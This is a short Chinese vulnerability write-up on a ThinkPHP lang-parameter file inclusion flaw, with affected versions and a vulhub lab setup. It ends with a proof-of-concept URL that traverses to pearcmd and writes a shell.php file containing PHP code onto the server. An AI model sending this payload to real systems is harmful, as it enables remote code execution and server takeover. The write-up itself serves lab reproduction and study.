ThinkPHP LoadLangPack lang 任意文件包含漏洞¶

漏洞描述¶

当Thinkphp 程序开启了多语言功能时，可以通过 get、header、cookie 等位置传入参数，使用 pearcmd 文件包含达到命令执行，获取服务器权限

漏洞影响¶

Thinkphp，v6.0.1~v6.0.13，v5.0.x，v5.1.x

环境搭建¶

docker pull vulhub/thinkphp:6.0.12

漏洞复现¶

主页面

验证POC

/public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php